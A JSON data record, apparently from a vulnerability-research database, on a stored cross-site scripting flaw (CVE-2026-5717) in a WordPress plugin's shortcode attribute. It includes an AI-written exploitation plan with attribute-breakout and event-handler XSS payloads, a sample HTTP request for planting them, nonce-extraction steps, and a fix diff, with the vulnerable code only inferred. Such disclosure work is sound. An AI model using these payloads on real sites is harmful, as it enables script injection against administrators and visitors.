[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fMHO1Qvc_4ypVNLs3JPaOW8cLVNDXQ8N3h4acLJ2QSmM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-5717","vi-include-post-by-authenticated-contributor-stored-cross-site-scripting-via-classcontainer-shortcode-attribute","VI: Include Post By \u003C= 0.4.200706 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'class_container' Shortcode Attribute","The VI: Include Post By plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class_container' attribute of the 'include-post-by-cat' shortcode in all versions up to, and including, 0.4.200706 due to insufficient input sanitization and output escaping on user supplied attributes. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","vi-include-post-by",null,"\u003C=0.4.200706","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-14 19:45:02","2026-04-15 07:45:29",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb3e95dc2-0f50-4009-9cc0-a02f9977ce58?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-5717\n\n## 1. Vulnerability Summary\nThe **VI: Include Post By** plugin (version \u003C= 0.4.200706) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the processing of the `[include-post-by-cat]` shortcode. Specifically, the attribute `class_container` is accepted from the user via the shortcode, but it is later rendered into the HTML output without sufficient sanitization (e.g., `wp_kses`) or context-appropriate escaping (e.g., `esc_attr`). This allows a user with `Contributor` privileges or higher—who can create posts and use shortcodes—to inject arbitrary HTML and JavaScript that executes when any user (including administrators) views the post.\n\n## 2. Attack Vector Analysis\n- **Target Endpoint:** Post Editor \u002F Post Rendering Page.\n- **Vulnerable Action:** Rendering the `[include-post-by-cat]` shortcode.\n- **Vulnerable Attribute:** `class_container`.\n- **Authentication Level:** Authenticated (`Contributor` or higher).\n- **Preconditions:**\n    1. The plugin `vi-include-post-by` must be active.\n    2. A user with `Contributor` role or higher must be able to create or edit a post.\n    3. (Recommended) At least one post should exist in a category to ensure the shortcode logic triggers the rendering of the container div.\n\n## 3. 
Code Flow (Inferred)\n1. **Entry Point:** The plugin registers the shortcode using `add_shortcode( 'include-post-by-cat', '...' )` in the main plugin file (likely `vi-include-post-by.php` or an included logic file).\n2. **Attribute Parsing:** The callback function (e.g., `vi_include_post_by_cat_shortcode`) receives the `$atts` array and typically merges it with defaults using `shortcode_atts()`.\n3. **Logic:** The function fetches posts based on category parameters.\n4. **Vulnerable Sink:** The code constructs a wrapper `div` or `span` using the `class_container` attribute:\n   ```php\n   \u002F\u002F Likely vulnerable pattern:\n   $class = $atts['class_container'];\n   $output .= '\u003Cdiv class=\"' . $class . '\">'; \n   ```\n5. **Output:** The unescaped string is returned by the shortcode function and echoed by WordPress into the page content.\n\n## 4. Nonce Acquisition Strategy\nWhile the *rendering* of a shortcode does not require a nonce, *storing* the shortcode in a post via the WordPress UI or REST API does.\n\n### For Post Creation (Contributor Level):\n1. **Navigate to Post Editor:** Use `browser_navigate` to `wp-admin\u002Fpost-new.php`.\n2. **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` from the heart-beat or post-data JSON objects, or simply extract it from the hidden input field:\n   - `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n3. **REST API Alternative:** If using the REST API, the `_wpnonce` is often localized in the `wp-api-fetch` or `wpApiSettings` object:\n   - `browser_eval(\"window.wpApiSettings?.nonce\")`\n\n## 5. Exploitation Strategy\nThe goal is to inject a payload that breaks out of the HTML attribute and executes JavaScript.\n\n### Payload\n`\" onmouseover=\"alert(document.domain)\" x=\"`\nor\n`\">\u003Cscript>alert(1)\u003C\u002Fscript>\u003Cdiv class=\"`\n\n### Step-by-Step Plan\n1. **Login:** Authenticate as a `Contributor` user.\n2. 
**Setup Data:** Create a standard post in a category (e.g., \"General\") to ensure the shortcode has content to process.\n3. **Injection:**\n   - Create a new post (or update an existing one).\n   - Set the content to: `[include-post-by-cat category_id=\"1\" class_container='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']` (assuming category ID 1 exists).\n4. **Trigger:** View the post URL as any user.\n5. **Observation:** The browser should execute the `alert(window.origin)` script.\n\n### Sample HTTP Request (Saving the Post)\n```http\nPOST \u002Fwp-admin\u002Fpost.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [Contributor Cookies]\n\naction=editpost\n&post_ID=[POST_ID]\n&_wpnonce=[NONCE]\n&post_title=XSS+Test\n&content=[include-post-by-cat+class_container%3D'%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E']\n&post_status=publish\n```\n\n## 6. Test Data Setup\n1. **User:** Create a user with the username `attacker` and role `contributor`.\n2. **Post Content:** Create at least one published post in category ID 1 (default \"Uncategorized\") so the shortcode produces output.\n   - `wp post create --post_title=\"Dummy Post\" --post_status=publish --post_category=1`\n3. **Target Page:** Create a page where the shortcode will be placed.\n   - `wp post create --post_type=page --post_title=\"Vulnerable Page\" --post_status=publish --post_author=[Attacker_ID]`\n\n## 7. Expected Results\n- When the page is viewed, the HTML source should look like:\n  `\u003Cdiv class=\"\">\u003Cscript>alert(1)\u003C\u002Fscript>\">...`\n- The `class_container` value is injected directly into the class attribute, allowing the `\">` characters to close the `div` tag and start a `\u003Cscript>` tag.\n\n## 8. Verification Steps\n1. **Check Source Code:** After visiting the page with `browser_navigate`, use `browser_eval(\"document.documentElement.outerHTML\")` and search for the string `\u003Cscript>alert(1)\u003C\u002Fscript>`.\n2. 
**Confirm Absence of Escaping:** Verify that the output is NOT `class=\"&quot;&gt;&lt;script&gt;...\"`.\n3. **Database Check:** Verify the shortcode is stored correctly:\n   - `wp post get [POST_ID] --field=post_content`\n\n## 9. Alternative Approaches\nIf the `class_container` is used inside a `style` attribute (unlikely given the name but possible), use a style-based XSS:\n- `class_container='x; background-image: url(\"javascript:alert(1)\");'`\n\nIf the plugin filters `\u003Cscript>` tags, use an event handler:\n- `class_container='\" onpointerenter=\"alert(1)\" style=\"display:block;width:1000px;height:1000px;\" x=\"'` (This creates a large invisible area that triggers when the admin moves their mouse).","The VI: Include Post By plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'class_container' attribute of the [include-post-by-cat] shortcode. This occurs because the plugin fails to sanitize or escape the user-supplied attribute before rendering it in the HTML output, allowing authenticated users with Contributor-level access to execute arbitrary JavaScript in the browsers of site visitors.","\u002F\u002F Inferred code structure from vi-include-post-by.php or similar logic file\nfunction vi_include_post_by_cat_shortcode($atts) {\n    $atts = shortcode_atts(array(\n        'category_id' => '',\n        'class_container' => '',\n        \u002F\u002F other attributes...\n    ), $atts);\n\n    $class = $atts['class_container'];\n\n    \u002F\u002F Vulnerable Sink: The attribute is concatenated directly into the HTML string without escaping\n    $output = '\u003Cdiv class=\"' . $class . '\">'; \n    \n    \u002F\u002F ... post fetching logic ...\n\n    return $output;\n}","--- a\u002Fvi-include-post-by.php\n+++ b\u002Fvi-include-post-by.php\n@@ -10,5 +10,5 @@\n-    $class = $atts['class_container'];\n-    $output = '\u003Cdiv class=\"' . $class . 
'\">';\n+    $class = esc_attr($atts['class_container']);\n+    $output = '\u003Cdiv class=\"' . $class . '\">';","The exploit target is the shortcode processing logic. An attacker with Contributor privileges (who can create posts and use shortcodes, but cannot publish posts) creates a post containing the [include-post-by-cat] shortcode. The attacker sets the 'class_container' attribute to a payload that breaks out of the HTML class attribute context, such as: '\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>'. When an administrator or any other user views the post (either in the editor preview or on the live site), the plugin renders the raw payload into the page source, leading to script execution.","gemini-3-flash-preview","2026-04-16 15:42:37","2026-04-16 15:42:58",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fvi-include-post-by\u002Ftags"]